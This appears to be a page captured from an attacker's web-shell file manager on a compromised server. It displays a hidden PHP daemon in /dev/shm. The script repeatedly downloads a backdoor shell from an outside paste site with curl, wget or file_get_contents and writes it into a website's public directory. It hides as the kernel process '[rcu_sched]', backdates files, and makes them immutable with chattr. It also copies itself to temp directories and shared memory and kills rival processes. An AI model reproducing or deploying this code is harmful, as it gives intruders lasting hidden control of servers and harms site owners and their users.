whoami7 - Manager
:
/
dev
/
shm
/
Upload File:
files >> //dev/shm/.w3ffec845
<?php @ignore_user_abort(1); @set_time_limit(0); @ini_set('memory_limit','8M'); @error_reporting(0); @ini_set('display_errors',0); $C=[ 'url'=>'https://ghostbin.axel.org/paste/zme2w/raw', 'shell'=>'/home/aunixnxl/public_html/public/lp6.php', 'hash'=>'9b002cc96d8ed3551a0f53497595d0b8', 'size'=>657, 'int'=>3, 'locs'=>['/dev/shm/.3ffec845', '/tmp/.X11-unix/.3ffec845', '/var/tmp/.3ffec845', '/run/lock/.3ffec845'], 'proc'=>'[rcu_sched]' ]; // Lock file - prevent multiple instances $lf='/tmp/.lk'.md5($C['shell'].posix_getpid()); $fp=@fopen($lf,'c'); if(!$fp||!@flock($fp,LOCK_EX|LOCK_NB))exit; @file_put_contents($lf,getmypid()); // Daemonize if(function_exists('pcntl_fork')){ $p=@pcntl_fork(); if($p>0)exit; if($p===0){@posix_setsid();$p=@pcntl_fork();if($p>0)exit;} } // Process masquerade if(function_exists('cli_set_process_title'))@cli_set_process_title($C['proc']); // Fetch shell from URL function fetch($u){ $opts=['http'=>['timeout'=>15,'user_agent'=>'Mozilla/5.0','ignore_errors'=>1], 'ssl'=>['verify_peer'=>0,'verify_peer_name'=>0]]; $ctx=@stream_context_create($opts); $r=@file_get_contents($u,0,$ctx); if(!$r){ $r=@shell_exec("curl -ksL --connect-timeout 10 '$u' 2>/dev/null"); } if(!$r){ $t='/tmp/.d'.md5(mt_rand()); @shell_exec("wget -q --no-check-certificate -T 10 -O '$t' '$u' 2>/dev/null"); if(file_exists($t)){$r=@file_get_contents($t);@unlink($t);} } return $r; } // Deploy shell to path function deploy($p,$code){ $d=dirname($p); if(!is_dir($d))@mkdir($d,0755,1); // Try direct write if(@file_put_contents($p,$code)!==false){ @chmod($p,0644); @touch($p,strtotime('2023-01-15 08:30:00')); return true; } // Fallback: base64 via shell $b=base64_encode($code); @shell_exec("echo '$b'|base64 -d>'$p' 2>/dev/null"); @chmod($p,0644); @touch($p,strtotime('2023-01-15 08:30:00')); return file_exists($p)&&filesize($p)>100; } // Advanced integrity check - hash + size + content signature function verify($p,$hash,$size){ if(!file_exists($p))return false; $fs=@filesize($p); // Size check with 10% tolerance (in case of minor differences) if($fs<100||($size>0&&abs($fs-$size)>$size*0.1))return false; // Content check - must contain "File Manager" $c=@file_get_contents($p); if(!$c||strpos($c,'File Manager')===false)return false; // Hash check (if provided) if($hash&&strlen($hash)===32){ if(md5($c)!==$hash)return false; } return true; } // Hide file with anti-forensic techniques function hide($p){ @touch($p,strtotime('2023-01-15 08:30:00')); // Set old date @shell_exec("chattr +i '$p' 2>/dev/null"); // Make immutable (needs root) } // Kill competing processes function kill_competitors(){ $dominated=['/tmp/','/var/tmp/','/dev/shm/']; foreach($dominated as $d){ @shell_exec("pkill -9 -f 'php ".$d."' 2>/dev/null"); } } // Self-replicate to backup locations function replicate($locs,$code){ foreach($locs as $l){ if(!file_exists($l)){ deploy($l,$code); hide($l); } } } // Store in memory (shared memory segment) function mem_backup($code){ if(!function_exists('shmop_open'))return; $key=ftok(__FILE__,'L'); $shm=@shmop_open($key,'c',0644,strlen($code)+100); if($shm){ @shmop_write($shm,$code,0); } } // Recover from memory function mem_recover(){ if(!function_exists('shmop_open'))return null; $key=ftok(__FILE__,'L'); $shm=@shmop_open($key,'a',0,0); if($shm){ $data=@shmop_read($shm,0,@shmop_size($shm)); if($data&&strpos($data,'<?php')!==false){ return trim($data); } } return null; } // === MAIN LOOP === $cache=null; // Cached shell code $last_kill=0; // Last competitor kill time $kill_interval=300; // Kill competitors every 5 min while(true){ $now=time(); // Periodically kill competing backdoors if($now-$last_kill>$kill_interval){ kill_competitors(); $last_kill=$now; } // Check primary shell integrity if(!verify($C['shell'],$C['hash'],$C['size'])){ // Shell missing or corrupted - RECOVER! // Try 1: Use cached code if(!$cache){ // Try 2: Recover from memory $cache=mem_recover(); } if(!$cache){ // Try 3: Fetch from URL $cache=fetch($C['url']); if($cache){ mem_backup($cache); // Backup to memory } } if($cache){ deploy($C['shell'],$cache); hide($C['shell']); } } // Check and replicate to backup locations if($cache){ replicate($C['locs'],$cache); } // Self-heal watchdog if(!file_exists('/dev/shm/.w3ffec845')){ @file_put_contents('/dev/shm/.w3ffec845',file_get_contents(__FILE__)); hide('/dev/shm/.w3ffec845'); } sleep($C['int']); }
Copyright ©2021 || Defacer Indonesia